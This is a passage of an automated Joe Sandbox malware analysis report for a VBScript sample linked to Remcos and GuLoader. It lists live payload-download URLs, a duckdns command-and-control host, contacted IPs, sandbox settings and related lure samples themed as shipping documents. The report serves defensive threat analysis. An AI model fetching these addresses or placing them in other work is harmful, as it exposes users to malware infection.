                  https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmtrue
                  • 17%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://asociatiatraditiimaria.ro/os/transportment.pfmtrue
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  iwarsut775laudrye2.duckdns.orgtrue
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://198.46.176.133/Upload/vbs.jpegfalse
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://geoplugin.net/json.gpfalse
                  • URL Reputation: safe
                  		unknown
                  http://104.168.45.34/59/LMTS.txtfalse
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=PbhvCCC4.tmp.7.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.imvu.comrRegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://asociatiatraditiimaria.ro/feed/powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://198.46.176.133/Upload/vbs.jpegMpowershell.exe, 00000002.00000002.2167362177.000001B1E9A60000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.nirsoft.netRegAsm.exe, 00000007.00000002.2129094375.00000000010F4000.00000004.00000010.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aefd.nelreports.net/api/report?cat=bingaotakbhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://deff.nelreports.net/api/report?cat=msnbhvCCC4.tmp.7.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://gmpg.org/xfn/11powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://198.46.176.133powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.comRegAsm.exe, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073bhvCCC4.tmp.7.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AFbhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://maps.windows.com/windows-app-web-linkbhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://asociatiatraditiimaria.ropowershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmptrue
                  • 5%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore6lBjqpowershell.exe, 0000000A.00000002.3272627711.0000000004195000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3272352105.0000000005281000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://login.yahoo.com/config/loginRegAsm.exefalse
                  • URL Reputation: safe
                  		unknown
                  https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0powershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://104.168.45.34powershell.exe, 00000002.00000002.2051614764.000001B1D1AA4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.nirsoft.net/RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.imvu.comataRegAsm.exe, 00000009.00000002.2124009469.00000000011CE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2051614764.000001B1D1881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004195000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3272352105.0000000005281000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.office.com/bhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://asociatiatraditiimaria.ro/comments/feed/powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949ebhvCCC4.tmp.7.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000009.00000002.2124009469.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.w.org/powershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004491000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000A.00000002.3335508177.00000000051FC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://asociatiatraditiimaria.ro/wp-json/powershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3272627711.0000000004491000.00000004.00000800.00020000.00000000.sdmptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.3272627711.00000000042E5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aefd.nelreports.net/api/report?cat=bingaotbhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2powershell.exe, 0000000A.00000002.3335508177.000000000546A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3335508177.0000000005445000.00000004.00000800.00020000.00000000.sdmptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://new.quranushaiqer.org.sapowershell.exe, 0000000A.00000002.3272627711.000000000453D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfmlpowershell.exe, 0000000E.00000002.3272352105.00000000053D6000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://aefd.nelreports.net/api/report?cat=bingrmsbhvCCC4.tmp.7.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/accounts/serviceloginRegAsm.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2051614764.000001B1D1881000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000009.00000002.2121605113.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  34.166.62.190
                  		new.quranushaiqer.org.saUnited States
                  		2686ATGS-MMD-ASUSfalse
                  93.113.54.56
                  		asociatiatraditiimaria.roRomania
                  		5588GTSCEGTSCentralEuropeAntelGermanyCZfalse
                  192.253.251.227
                  		iwarsut775laudrye2.duckdns.orgUnited States
                  		50613THORDC-ASIStrue
                  198.46.176.133
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUSfalse
                  178.237.33.50
                  		geoplugin.netNetherlands
                  		8455ATOM86-ASATOM86NLfalse
                  104.168.45.34
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUSfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1483434
                  Start date and time:2024-07-27 13:30:11 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 20s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:createdthingstobefrankwithmeeverywhere.gIF.vbs
                  Detection:MAL
                  Classification:mal100.rans.phis.troj.spyw.expl.evad.winVBS@25/16@4/6
                  EGA Information:
                  • Successful, ratio: 83.3%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 155
                  • Number of non-executed functions: 332
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 199.232.214.172
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 7244 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  07:30:57API Interceptor247729x Sleep call for process: powershell.exe modified
                  07:31:09API Interceptor1x Sleep call for process: wscript.exe modified
                  07:31:34API Interceptor1124999x Sleep call for process: RegAsm.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  34.166.62.19017220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                    girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                      waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                        93.113.54.5617220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                          girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                            waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                              dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                  https://avocat.srl/Auth#7045anVsaS5yaWxlc0B6YmV0YS5jb20=??Jqeh==%25RANDOM5#7045anVsaS5yaWxlc0B6YmV0YS5jb20=??Jqeh==96682=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d%25=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781dGet hashmaliciousUnknownBrowse
                                    192.253.251.22717220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                      girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                          awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                              ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                  pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                    awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        198.46.176.133createactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        creatednewwaterbottleforme.gIF.vbsGet hashmaliciousUnknownBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        IFqsFpijFt.rtfGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        erthings.docGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        girlfrnd.docGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        new.quranushaiqer.org.sa17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 34.166.62.190
                                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 34.166.62.190
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 34.166.62.190
                                                        iwarsut775laudrye2.duckdns.org17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.228
                                                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        asociatiatraditiimaria.ro17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 93.113.54.56
                                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 93.113.54.56
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 93.113.54.56
                                                        dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                                        • 93.113.54.56
                                                        dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                                        • 93.113.54.56
                                                        geoplugin.netcreateactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        Shipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 178.237.33.50
                                                        172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 178.237.33.50
                                                        erthings.docGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        girlfrnd.docGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        bg.microsoft.map.fastly.nethttps://www.canva.com/design/DAGMDp-pdRs/DFmIVehjt-ABqDbwZmCQ6Q/view?utm_content=DAGMDp-pdRs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                        • 199.232.214.172
                                                        nuCc19sDOl.exeGet hashmaliciousRedLineBrowse
                                                        • 199.232.214.172
                                                        d34e1p5zD2.exeGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        QIKiV83Pkl.exeGet hashmaliciousDCRatBrowse
                                                        • 199.232.214.172
                                                        41DLTjkmOm.exeGet hashmaliciousRemcosBrowse
                                                        • 199.232.210.172
                                                        Ycj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        oz9Blof9tN.msiGet hashmaliciousCobaltStrikeBrowse
                                                        • 199.232.214.172
                                                        QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 199.232.210.172
                                                        invoker.ps1Get hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                        • 199.232.214.172

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        GTSCEGTSCentralEuropeAntelGermanyCZ17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 93.113.54.56
                                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 93.113.54.56
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 93.113.54.56
                                                        LisectAVT_2403002A_35.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                        • 185.146.87.128
                                                        sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 195.56.40.173
                                                        RiI7W2cj7p.elfGet hashmaliciousUnknownBrowse
                                                        • 213.29.127.166
                                                        https://liceultehnologicrosiajiu.ro/ulin/ulin8ce.htmlGet hashmaliciousCVE-2024-21412Browse
                                                        • 85.9.47.248
                                                        KBNCt45Gpk.elfGet hashmaliciousMiraiBrowse
                                                        • 212.203.170.235
                                                        5xUAAMwlnJ.elfGet hashmaliciousUnknownBrowse
                                                        • 193.86.218.248
                                                        COMANDA_AXM_NR17_DIN_240717.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                        • 185.146.87.128
                                                        AS-COLOCROSSINGUScreateactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133
                                                        screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                                                        • 192.3.101.142
                                                        creatednewwaterbottleforme.gIF.vbsGet hashmaliciousUnknownBrowse
                                                        • 198.46.176.133
                                                        FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                        • 107.173.160.137
                                                        e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                        • 107.173.160.137
                                                        file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                        • 107.173.160.137
                                                        jjjUC5ggb2nQMb1B6SvBkwmT.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                        • 23.94.183.150
                                                        WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                                                        • 104.168.36.68
                                                        172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 192.3.101.142
                                                        1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 192.210.214.9
                                                        ATGS-MMD-ASUSfile.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                        • 34.160.144.191
                                                        8NjcvPNvUr.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                        • 34.160.144.191
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 34.160.144.191
                                                        THORDC-ASIS17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.228
                                                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
